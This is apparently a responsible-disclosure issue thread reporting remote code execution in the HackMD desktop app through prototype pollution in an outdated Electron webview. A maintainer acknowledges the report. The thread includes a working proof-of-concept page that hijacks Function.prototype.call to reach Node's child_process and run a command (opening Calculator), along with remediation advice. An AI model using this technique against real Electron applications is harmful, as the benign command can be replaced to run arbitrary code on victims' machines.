hackmd desktop remote code execution

[imagemlt]

hackmd desktop use an old version of electron, in which we can use prototype pollution to get node ability back in webviews without nodeintegration.

poc:

<a href="http://127.0.0.1/gg.html">click me</a>

here is source code of gg.html

<script>
Function.prototype.call2=Function.prototype.call;
Function.prototype.call=function(...args){
    if(args[0]!=null && args[0]!=undefined && args[0].env!=undefined){
        Function.prototype.call=Function.prototype.call2;
        args[0].mainModule.require('child_process').exec('open -a Calculator');
        }
        return this.call2(...args)
}
location.reload();
</script>

when click on it we can get a Calculator on mac.

suggestions:

• open external links in system's browser
• update electron
• add contextisolation.

[imagemlt]

any questions?

[jackycute]

Hi @imagemlt,
Thanks for reporting this issue and giving us suggestion.
We will investigate this soon.